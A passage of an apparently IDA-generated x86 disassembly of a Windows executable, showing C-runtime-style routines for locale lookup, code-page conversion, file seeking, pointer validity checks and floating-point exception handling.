mov ecx, dword_4C5DC0[ecx*4]
and eax, 1Fh
lea eax, [ecx+eax*8]
test byte ptr [eax+4], 1
jz short loc_415FD1
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_415FD1: ; CODE XREF: sub_415FAA+A�j
; sub_415FAA+22�j
and dword_4C5908, 0
mov dword_4C5904, 9
or eax, 0FFFFFFFFh
retn
sub_415FAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415FE6 proc near ; CODE XREF: sub_412ED1+27D�p
; sub_41512C+15E�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_421360
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call dword_41914C ; GetLocaleInfoA
test eax, eax
jnz short loc_416018
or eax, 0FFFFFFFFh
jmp short loc_416022
; ---------------------------------------------------------------------------
loc_416018: ; CODE XREF: sub_415FE6+2B�j
lea eax, [ebp+var_C]
push eax
call sub_40E070
pop ecx
loc_416022: ; CODE XREF: sub_415FE6+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_411BA5
leave
retn
sub_415FE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41602F proc near ; CODE XREF: sub_412ED1+2A8�p
; sub_412ED1+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_41C768
call __SEH_prolog
mov eax, dword_421360
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_4161D8
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, dword_4191A4
call esi ; GetCPInfo
test eax, eax
jz short loc_416096
cmp [ebp+var_40], 1
jnz short loc_416096
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_416096
cmp [ebp+var_40], 1
jnz short loc_416096
mov [ebp+var_2C], 1
loc_416096: ; CODE XREF: sub_41602F+45�j
; sub_41602F+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_4160B5
cmp ebx, 0FFFFFFFFh
jz short loc_4160A4
mov esi, ebx
jmp short loc_4160B0
; ---------------------------------------------------------------------------
loc_4160A4: ; CODE XREF: sub_41602F+6F�j
push [ebp+arg_8]
call sub_40D630
pop ecx
mov esi, eax
inc esi
loc_4160B0: ; CODE XREF: sub_41602F+73�j
mov [ebp+var_44], esi
jmp short loc_4160B8
; ---------------------------------------------------------------------------
loc_4160B5: ; CODE XREF: sub_41602F+6A�j
mov esi, [ebp+var_44]
loc_4160B8: ; CODE XREF: sub_41602F+84�j
cmp [ebp+var_2C], edi
jnz short loc_4160D7
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_41913C ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_41612F
loc_4160D7: ; CODE XREF: sub_41602F+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_40D7B0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41611B
; ---------------------------------------------------------------------------
loc_416104: ; DATA XREF: .text:stru_41C768�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_416108: ; DATA XREF: .text:stru_41C768�o
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_41611B: ; CODE XREF: sub_41602F+D3�j
cmp ebx, edi
jnz short loc_41613D
push esi
push 2
call sub_410733
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_416136
loc_41612F: ; CODE XREF: sub_41602F+A6�j
xor eax, eax
jmp loc_4161EA
; ---------------------------------------------------------------------------
loc_416136: ; CODE XREF: sub_41602F+FE�j
mov [ebp+var_24], 1
loc_41613D: ; CODE XREF: sub_41602F+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_41913C ; MultiByteToWideChar
test eax, eax
jz loc_4161DB
cmp [ebp+arg_10], edi
jz short loc_41617D
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_419058 ; WideCharToMultiByte
test eax, eax
jz short loc_4161DB
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_4161DB
; ---------------------------------------------------------------------------
loc_41617D: ; CODE XREF: sub_41602F+12C�j
cmp [ebp+var_2C], edi
jnz short loc_416198
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_419058 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_4161DB
loc_416198: ; CODE XREF: sub_41602F+151�j
push esi
push 1
call sub_410733
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_4161DB
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_419058 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_4161CB
push [ebp+var_20]
call sub_40E359
pop ecx
mov [ebp+var_20], edi
jmp short loc_4161DB
; ---------------------------------------------------------------------------
loc_4161CB: ; CODE XREF: sub_41602F+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_4161DB
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4161DB
; ---------------------------------------------------------------------------
loc_4161D8: ; CODE XREF: sub_41602F+30�j
mov ebx, [ebp+var_48]
loc_4161DB: ; CODE XREF: sub_41602F+123�j
; sub_41602F+144�j ...
cmp [ebp+var_24], edi
jz short loc_4161E7
push ebx
call sub_40E359
pop ecx
loc_4161E7: ; CODE XREF: sub_41602F+1AF�j
mov eax, [ebp+var_20]
loc_4161EA: ; CODE XREF: sub_41602F+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_411BA5
call __SEH_epilog
retn
sub_41602F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161FE proc near ; CODE XREF: sub_41330B+68�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_4C5DA0
push esi
push edi
jnb short loc_416282
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4C5DC0h[ecx*4]
mov ecx, [edi]
shl esi, 3
test byte ptr [ecx+esi+4], 1
jz short loc_416282
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_8]
push eax
mov [ebp+var_4], ecx
call sub_415FAA
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416289
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call dword_419114 ; SetFilePointer
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_416271
call dword_4190AC ; RtlGetLastWin32Error
test eax, eax
jz short loc_416271
push eax
call sub_412BBA
pop ecx
jmp short loc_416293
; ---------------------------------------------------------------------------
loc_416271: ; CODE XREF: sub_4161FE+5E�j
; sub_4161FE+68�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
jmp short loc_416299
; ---------------------------------------------------------------------------
loc_416282: ; CODE XREF: sub_4161FE+10�j
; sub_4161FE+2D�j
and dword_4C5908, 0
loc_416289: ; CODE XREF: sub_4161FE+45�j
mov dword_4C5904, 9
loc_416293: ; CODE XREF: sub_4161FE+71�j
or eax, 0FFFFFFFFh
or edx, 0FFFFFFFFh
loc_416299: ; CODE XREF: sub_4161FE+82�j
pop edi
pop esi
leave
retn
sub_4161FE endp
; =============== S U B R O U T I N E =======================================
sub_41629D proc near ; CODE XREF: sub_4139C1+53�p
; sub_4139C1+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_419188 ; IsBadReadPtr
test eax, eax
jz short loc_4162B5
xor esi, esi
loc_4162B5: ; CODE XREF: sub_41629D+14�j
mov eax, esi
pop esi
retn
sub_41629D endp
; =============== S U B R O U T I N E =======================================
sub_4162B9 proc near ; CODE XREF: sub_4139C1+65�p
; sub_4139C1+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_41916C ; IsBadWritePtr
test eax, eax
jz short loc_4162D1
xor esi, esi
loc_4162D1: ; CODE XREF: sub_4162B9+14�j
mov eax, esi
pop esi
retn
sub_4162B9 endp
; =============== S U B R O U T I N E =======================================
sub_4162D5 proc near ; CODE XREF: sub_4139C1+128�p
; sub_41437B+2D�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call dword_41918C ; IsBadCodePtr
test eax, eax
jz short loc_4162E9
xor esi, esi
loc_4162E9: ; CODE XREF: sub_4162D5+10�j
mov eax, esi
pop esi
retn
sub_4162D5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_413EDF
loc_4162ED: ; CODE XREF: sub_413EDF:loc_413F07�j
push 0Ah
call sub_4144B2
push 16h
call sub_41784C
pop ecx
pop ecx
push 3
call sub_40DE75
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_413EDF
; =============== S U B R O U T I N E =======================================
sub_416305 proc near ; CODE XREF: sub_413F8C+11D�p
; sub_413F8C+1D8�p ...
xor eax, eax
retn
sub_416305 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416308 proc near ; CODE XREF: sub_416914+4D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
push ebx
xor ebx, ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
push esi
inc ebx
test cl, 10h
push edi
jz short loc_41633A
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_41633A: ; CODE XREF: sub_416308+23�j
test cl, 2
jz short loc_41634D
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_41634D: ; CODE XREF: sub_416308+35�j
test cl, bl
jz short loc_41635F
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_41635F: ; CODE XREF: sub_416308+47�j
test cl, 4
jz short loc_416372
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_416372: ; CODE XREF: sub_416308+5A�j
test cl, 8
jz short loc_416385
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_416385: ; CODE XREF: sub_416308+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
push 2
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 1
not ecx
xor ecx, [eax+8]
pop edi
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, edi
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_416B24
test al, bl
jz short loc_4163F6
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_4163F6: ; CODE XREF: sub_416308+E5�j
test al, 4
jz short loc_416401
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_416401: ; CODE XREF: sub_416308+F0�j
test al, 8
jz short loc_41640C
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41640C: ; CODE XREF: sub_416308+FB�j
test al, 10h
jz short loc_416416
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_416416: ; CODE XREF: sub_416308+106�j
test al, 20h
jz short loc_416420
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_416420: ; CODE XREF: sub_416308+110�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41645F
cmp eax, 400h
jz short loc_416451
cmp eax, 800h
jz short loc_416445
cmp eax, ecx
jnz short loc_416465
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_416465
; ---------------------------------------------------------------------------
loc_416445: ; CODE XREF: sub_416308+12F�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41645B
; ---------------------------------------------------------------------------
loc_416451: ; CODE XREF: sub_416308+128�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41645B: ; CODE XREF: sub_416308+147�j
mov [eax], ecx
jmp short loc_416465
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_416308+121�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_416465: ; CODE XREF: sub_416308+133�j
; sub_416308+13B�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_416490
cmp eax, 200h
jz short loc_416483
cmp eax, ecx
jnz short loc_41649D
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41649D
; ---------------------------------------------------------------------------
loc_416483: ; CODE XREF: sub_416308+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41649B
; ---------------------------------------------------------------------------
loc_416490: ; CODE XREF: sub_416308+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41649B: ; CODE XREF: sub_416308+186�j
mov [eax], ecx
loc_41649D: ; CODE XREF: sub_416308+171�j
; sub_416308+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
call sub_416B31
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_4191C0 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41650F
and dword ptr [esi], 0FFFFFFFEh
loc_41650F: ; CODE XREF: sub_416308+202�j
test byte ptr [eax+8], 8
jz short loc_416518
and dword ptr [esi], 0FFFFFFFBh
loc_416518: ; CODE XREF: sub_416308+20B�j
test byte ptr [eax+8], 4
jz short loc_416521
and dword ptr [esi], 0FFFFFFF7h
loc_416521: ; CODE XREF: sub_416308+214�j
test byte ptr [eax+8], 2
jz short loc_41652A
and dword ptr [esi], 0FFFFFFEFh
loc_41652A: ; CODE XREF: sub_416308+21D�j
test [eax+8], bl
jz short loc_416532
and dword ptr [esi], 0FFFFFFDFh
loc_416532: ; CODE XREF: sub_416308+225�j
mov ecx, [eax]
and ecx, 3
sub ecx, 0
mov edx, 0FFFFF3FFh
jz short loc_416572
dec ecx
jz short loc_416560
dec ecx
jz short loc_416550
dec ecx
jnz short loc_416574
or byte ptr [esi+1], 0Ch
jmp short loc_416574
; ---------------------------------------------------------------------------
loc_416550: ; CODE XREF: sub_416308+23D�j
mov ecx, [esi]
and ecx, 0FFFFFBFFh
or ecx, 800h
jmp short loc_41656E
; ---------------------------------------------------------------------------
loc_416560: ; CODE XREF: sub_416308+23A�j
mov ecx, [esi]
and ecx, 0FFFFF7FFh
or ecx, 400h
loc_41656E: ; CODE XREF: sub_416308+256�j
mov [esi], ecx
jmp short loc_416574
; ---------------------------------------------------------------------------
loc_416572: ; CODE XREF: sub_416308+237�j
and [esi], edx
loc_416574: ; CODE XREF: sub_416308+240�j
; sub_416308+246�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_416597
dec ecx
jz short loc_41658B
dec ecx
jnz short loc_4165A3
and [esi], edx
jmp short loc_4165A3
; ---------------------------------------------------------------------------
loc_41658B: ; CODE XREF: sub_416308+27A�j
mov ecx, [esi]
and ecx, edx
or ecx, 200h
jmp short loc_4165A1
; ---------------------------------------------------------------------------
loc_416597: ; CODE XREF: sub_416308+277�j
mov ecx, [esi]
and ecx, edx
or ecx, 300h
loc_4165A1: ; CODE XREF: sub_416308+28D�j
mov [esi], ecx
loc_4165A3: ; CODE XREF: sub_416308+27D�j
; sub_416308+281�j
fld qword ptr [eax+50h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_416308 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165AD proc near ; CODE XREF: sub_416914+25�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_4165DB
test byte ptr [ebp+arg_8], bl
jz short loc_4165DB
push ebx
call sub_416B63
pop ecx
and esi, 0FFFFFFF7h
jmp loc_4167AD
; ---------------------------------------------------------------------------
loc_4165DB: ; CODE XREF: sub_4165AD+18�j
; sub_4165AD+1D�j
test al, 4
jz short loc_4165F5
test byte ptr [ebp+arg_8], 4
jz short loc_4165F5
push 4
call sub_416B63
pop ecx
and esi, 0FFFFFFFBh
jmp loc_4167AD
; ---------------------------------------------------------------------------
loc_4165F5: ; CODE XREF: sub_4165AD+30�j
; sub_4165AD+36�j
test al, bl
jz loc_4166D5
test byte ptr [ebp+arg_8], 8
jz loc_4166D5
push 8
call sub_416B63
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz loc_4166AB
cmp eax, 400h
jz short loc_416681
cmp eax, 800h
jz short loc_416657
cmp eax, ecx
jnz loc_4166CD
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_41BC80
fld dbl_421768
fnstsw ax
test ah, 41h
jz short loc_41664F
fchs
loc_41664F: ; CODE XREF: sub_4165AD+9E�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_4166CB
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_4165AD+7E�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_41BC80
fnstsw ax
test ah, 41h
jnz short loc_416671
fld dbl_421758
jmp short loc_416679
; ---------------------------------------------------------------------------
loc_416671: ; CODE XREF: sub_4165AD+BA�j
fld dbl_421768
fchs
loc_416679: ; CODE XREF: sub_4165AD+C2�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_4166CB
; ---------------------------------------------------------------------------
loc_416681: ; CODE XREF: sub_4165AD+77�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_41BC80
fnstsw ax
test ah, 41h
jnz short loc_41669B
fld dbl_421768
jmp short loc_4166A3
; ---------------------------------------------------------------------------
loc_41669B: ; CODE XREF: sub_4165AD+E4�j
fld dbl_421758
fchs
loc_4166A3: ; CODE XREF: sub_4165AD+EC�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_4166CB
; ---------------------------------------------------------------------------
loc_4166AB: ; CODE XREF: sub_4165AD+6C�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_41BC80
fld dbl_421758
fnstsw ax
test ah, 41h
jz short loc_4166C5
fchs
loc_4166C5: ; CODE XREF: sub_4165AD+114�j
fstp [ebp+var_10]
fld [ebp+var_10]
loc_4166CB: ; CODE XREF: sub_4165AD+A8�j
; sub_4165AD+D2�j ...
fstp qword ptr [ecx]
loc_4166CD: ; CODE XREF: sub_4165AD+82�j
and esi, 0FFFFFFFEh
jmp loc_4167AD
; ---------------------------------------------------------------------------
loc_4166D5: ; CODE XREF: sub_4165AD+4A�j
; sub_4165AD+54�j
test al, 2
jz loc_4167AD
test byte ptr [ebp+arg_8], 10h
jz loc_4167AD
xor esi, esi
test al, 10h
jz short loc_4166EF
mov esi, ebx
loc_4166EF: ; CODE XREF: sub_4165AD+13E�j
push edi
mov edi, [ebp+arg_4]
fld qword ptr [edi]
fcomp dbl_41BC80
fnstsw ax
test ah, 44h
jnp loc_416797
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_416A6A
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
fld [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_41673A
fmul dbl_41BC80
mov esi, ebx
jmp short loc_41678D
; ---------------------------------------------------------------------------
loc_41673A: ; CODE XREF: sub_4165AD+181�j
fcomp dbl_41BC80
fnstsw ax
test ah, 5
jp short loc_41674B
mov edx, ebx
jmp short loc_41674D
; ---------------------------------------------------------------------------
loc_41674B: ; CODE XREF: sub_4165AD+198�j
xor edx, edx
loc_41674D: ; CODE XREF: sub_4165AD+19C�j
xor eax, eax
mov al, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_416784
sub eax, ecx
loc_416767: ; CODE XREF: sub_4165AD+1D5�j
test byte ptr [ebp+var_10], bl
jz short loc_416772
test esi, esi
jnz short loc_416772
mov esi, ebx
loc_416772: ; CODE XREF: sub_4165AD+1BD�j
; sub_4165AD+1C1�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_41677E
or byte ptr [ebp+var_10+3], 80h
loc_41677E: ; CODE XREF: sub_4165AD+1CB�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_416767
loc_416784: ; CODE XREF: sub_4165AD+1B6�j
test edx, edx
jz short loc_416790
fld [ebp+var_10]
fchs
loc_41678D: ; CODE XREF: sub_4165AD+18B�j
fstp [ebp+var_10]
loc_416790: ; CODE XREF: sub_4165AD+1D9�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_416799
; ---------------------------------------------------------------------------
loc_416797: ; CODE XREF: sub_4165AD+153�j
mov esi, ebx
loc_416799: ; CODE XREF: sub_4165AD+1E8�j
test esi, esi
pop edi
jz short loc_4167A6
push 10h
call sub_416B63
pop ecx
loc_4167A6: ; CODE XREF: sub_4165AD+1EF�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_4167AD: ; CODE XREF: sub_4165AD+29�j
; sub_4165AD+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_4167C4
test byte ptr [ebp+arg_8], 20h
jz short loc_4167C4
push 20h
call sub_416B63
pop ecx
and esi, 0FFFFFFEFh
loc_4167C4: ; CODE XREF: sub_4165AD+204�j
; sub_4165AD+20A�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_4165AD endp
; =============== S U B R O U T I N E =======================================
sub_4167CF proc near ; CODE XREF: sub_416822+6C�p
; sub_416822+93�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_4167EA
jle short locret_4167F4
cmp eax, 3
jg short locret_4167F4
mov dword_4C5904, 22h
retn
; ---------------------------------------------------------------------------
loc_4167EA: ; CODE XREF: sub_4167CF+7�j
mov dword_4C5904, 21h
locret_4167F4: ; CODE XREF: sub_4167CF+9�j
; sub_4167CF+E�j
retn
sub_4167CF endp
; =============== S U B R O U T I N E =======================================
sub_4167F5 proc near ; CODE XREF: sub_416914+58�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_416801
push 5
jmp short loc_416817
; ---------------------------------------------------------------------------
loc_416801: ; CODE XREF: sub_4167F5+6�j
test al, 8
jz short loc_416809
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_416809: ; CODE XREF: sub_4167F5+E�j
test al, 4
jz short loc_416811
push 2
jmp short loc_416817
; ---------------------------------------------------------------------------
loc_416811: ; CODE XREF: sub_4167F5+16�j
test al, 1
jz short loc_416819
push 3
loc_416817: ; CODE XREF: sub_4167F5+A�j
; sub_4167F5+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_416819: ; CODE XREF: sub_4167F5+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_4167F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416822(int,int,int,int,int,int,double,int)
sub_416822 proc near ; CODE XREF: sub_4168C2+2A�p
; sub_416914+8A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_41682A: ; CODE XREF: sub_416822+18�j
mov ecx, dword_421670[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_41689C
inc eax
cmp eax, 1Dh
jl short loc_41682A
xor eax, eax
loc_41683E: ; CODE XREF: sub_416822+81�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_4168A5
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_416B3F
lea eax, [ebp+var_20]
push eax
call sub_416305
add esp, 0Ch
test eax, eax
jnz short loc_416896
push esi
call sub_4167CF
add esp, 4
loc_416896: ; CODE XREF: sub_416822+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41689C: ; CODE XREF: sub_416822+12�j
mov eax, off_421674[eax*8]
jmp short loc_41683E
; ---------------------------------------------------------------------------
loc_4168A5: ; CODE XREF: sub_416822+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_416B3F
push [ebp+arg_0]
call sub_4167CF
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_416822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4168C2(int,double,int)
sub_4168C2 proc near ; CODE XREF: sub_4142AA+51�p
; sub_4143E1+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_421668, 0
jnz short loc_4168F6
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
